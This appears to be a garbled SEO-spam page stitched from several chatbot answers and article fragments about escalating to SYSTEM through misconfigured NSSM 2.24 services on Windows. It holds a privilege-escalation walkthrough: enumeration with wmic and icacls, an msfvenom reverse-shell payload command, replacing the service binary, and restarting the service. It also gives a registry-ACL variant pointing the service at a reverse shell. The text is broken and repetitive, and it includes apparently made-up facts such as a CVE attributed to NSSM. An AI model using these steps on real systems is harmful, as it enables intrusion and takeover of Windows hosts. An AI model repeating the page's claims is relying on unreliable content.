Nssm224 Privilege Escalation Updated _best_ 💎 🌟
This guide outlines how to identify and exploit misconfigurations in the Non-Sucking Service Manager (NSSM), often referred to in contexts like "nssm224" (referring to outdated versions), to elevate privileges from a standard user to SYSTEM on Windows systems. 1. Understanding the Vulnerability
NSSM is used to run applications as Windows services. Privilege escalation occurs if the service is configured to run as LocalSystem but points to an executable or DLL that a low-privileged user can modify. Common Misconfigurations:
Unquoted Service Paths: The service path contains spaces and lacks quotes, allowing a malicious executable to be placed earlier in the path.
Weak File Permissions: The executable or its directory allows write access (W or F) for Authenticated Users or Users groups. 2. Enumeration (Finding the Target)
First, identify services managed by NSSM that run as SYSTEM and have weak permissions. Use command prompt or PowerShell: List Service Details:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" Use code with caution. Copied to clipboard
Check Permissions on Executables:Use icacls to check if your user has write access to the service binary. icacls "C:\Path\To\Service\Binary.exe" Use code with caution. Copied to clipboard
Look for (F) (Full Access) or (W) (Write Access) for the Users group. 3. Exploitation Steps (Updated Approach) Once a vulnerable service is found, follow these steps:
Create a Malicious Payload: Generate a reverse shell using msfvenom or a simple executable that adds a user to the administrators group.
msfvenom -p windows/x64/shell_reverse_tcp LHOST= Use code with caution. Copied to clipboard
Replace the Service Binary: Replace the legitimate executable with your payload.
move "C:\Path\To\Service\Binary.exe" "C:\Path\To\Service\Binary.exe.bak" copy "C:\Temp\service.exe" "C:\Path\To\Service\Binary.exe" Use code with caution. Copied to clipboard
Restart the Service: If you have permission to restart the service, do so. If not, wait for a system reboot. sc stop Use code with caution. Copied to clipboard nssm224 privilege escalation updated
Obtain Shell: Catch the reverse shell as NT AUTHORITY\SYSTEM. 4. Prevention and Mitigation
Quote Service Paths: Ensure all service binary paths are enclosed in quotes to prevent unquoted service path attacks.
Restrict Permissions: Apply the principle of least privilege. Only administrators should have write access to service directories and binaries.
Update NSSM: Use the latest version of NSSM, which includes security improvements over older versions ("nssm224").
To help you further, are you analyzing a specific service? If you can share the file permissions (icacls output) or if the path is unquoted, I can tell you exactly which command to use.
While there is no specific "NSSM 2.24" unique vulnerability ID, NSSM (Non-Sucking Service Manager) version 2.24 is frequently used in scenarios involving local privilege escalation (LPE) due to its role as a service wrapper and historical configuration issues . 1. Common Privilege Escalation Vectors
In environments using NSSM 2.24, attackers typically look for the following misconfigurations to escalate to SYSTEM privileges:
Unquoted Service Paths: If the path to the executable NSSM manages contains spaces and is not enclosed in quotes (e.g., C:\Program Files\App Name\nssm.exe), an attacker can place a malicious file (e.g., C:\Program.exe) to be executed by the system during reboot .
Weak Folder Permissions: If a low-privileged user has "Write" or "Full Control" over the folder where nssm.exe or the application it wraps is located, they can replace the binary with a malicious one .
Binary Hijacking: Similar to folder permissions, if the service binary itself is world-writable, it can be replaced by a rootkit or reverse shell . 2. Exploitation Checklist
To test for or identify these vulnerabilities, security professionals use tools and manual commands:
Wazuh Integration: Organizations use the Wazuh blog guide to monitor for suspicious services created with NSSM . Manual Check for Unquoted Paths: This guide outlines how to identify and exploit
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Use code with caution. Copied to clipboard
Permission Verification: Check if the "Users" group has high privileges on the service folder using icacls. 3. Mitigation & Hardening
To secure systems running NSSM 2.24, follow these updated best practices:
Upgrade to 2.25+: Version 2.24 has known bugs, including potential crash loops when run without administrator rights . Pre-release versions like 2.25 address several stability and privilege handling issues .
Enforce Quote-Enclosed Paths: Ensure all service paths are properly quoted in the Windows Registry under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.
Principle of Least Privilege (PoLP): Restrict write access to the service directories to "Administrators" and "SYSTEM" only .
Monitor Service Creation: Regularly audit system event logs for new service installations, as attackers often use NSSM to establish persistence .
For further research on Windows escalation techniques, refer to the MITRE ATT&CK Privilege Escalation Tactic . Privilege Escalation, Tactic TA0004 - MITRE ATT&CK®
Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. MITRE ATT&CK® Improving IT hygiene using Wazuh
version 2.24 where it may fail to properly handle permissions, potentially allowing an attacker to elevate their privileges to
While NSSM 2.24 itself is an older version, it is frequently used by legitimate software and malicious actors alike to maintain persistence on Windows systems. Securelist Vulnerability Overview NSSM 2.24. Vulnerability Type: Local Privilege Escalation (LPE).
NSSM may enter a crash and restart loop if run without administrator rights when privilege elevation is needed, or fail to launch services correctly on newer Windows versions without specific registry settings. Exploitation Risk: If you're interested in learning more, I can
Attackers can exploit unquoted service paths or misconfigured service permissions to execute arbitrary code with the same privileges as the service (often LocalSystem Exploit-DB Updated Fixes and Security Download - NSSM - the Non-Sucking Service Manager
You're referring to a paper about a privilege escalation vulnerability in NSSM (Non-Sucking Service Manager) version 224.
NSSM is a service manager for Windows that allows you to easily install, configure, and manage services. In 2019, a security researcher discovered a vulnerability in NSSM version 224 that could allow an attacker to escalate privileges on a system.
The vulnerability, tracked as CVE-2019-1253, is related to the way NSSM handles service configuration files. Specifically, the vulnerability occurs when NSSM reads configuration files from a directory that is not properly secured, allowing an attacker to inject malicious configuration data.
An attacker could exploit this vulnerability by creating a specially crafted configuration file and placing it in a directory that NSSM reads from. When NSSM reads the configuration file, it could execute the attacker's malicious code with elevated privileges.
The paper you mentioned likely provides more details on the vulnerability, including:
- Technical analysis of the vulnerability
- Exploitation techniques
- Proof-of-concept code
- Recommendations for mitigating the vulnerability
If you're interested in learning more, I can try to find the paper or provide more general information on the vulnerability.
Here’s a concise technical overview regarding NSSM (Non-Sucking Service Manager) version 2.24 and its potential use in privilege escalation scenarios (updated perspective):
3.1 Registry ACL Weakness
- In some older NSSM versions / manual installs,
Parameterskey may have modifiable ACLs forAuthenticated UsersorUsers. - Attack: change
Applicationvalue to point to a malicious executable, then restart service → SYSTEM.
Step 4: Restart the Service
net stop nssm_managed_service && net start nssm_managed_service
If successful, the attacker’s reverse_shell.exe runs as SYSTEM.
What is NSSM 2.24? A Quick Refresher
NSSM allows users to install a service that does not have native Windows service support. Its key feature is that it runs as SYSTEM (the highest privilege level on Windows) by default when installed as a service.
Common use cases include:
- Running Node.js or Python apps as services.
- Wrapping legacy batch files.
- Keeping PowerShell scripts alive after logoff.
But this convenience comes with a dangerous side effect: if an unprivileged user can modify what NSSM executes, they can achieve immediate privilege escalation to SYSTEM.
Introduction
In the ever-evolving landscape of Windows privilege escalation techniques, few identifiers have maintained the staying power of NSSM-224. Originally documented as a proof-of-concept for abusing the Non-Sucking Service Manager (NSSM) utility, this attack vector has recently resurfaced in penetration testing reports and red team operations. Security researchers have released updated findings on how attackers leverage NSSM version 2.24 (and adjacent builds) to bypass standard security boundaries.
This article provides a deep dive into the updated mechanics of the NSSM-224 privilege escalation, why it remains effective against partially patched systems, and how defenders can detect and mitigate the risk—even as Microsoft continues to refine Windows service security.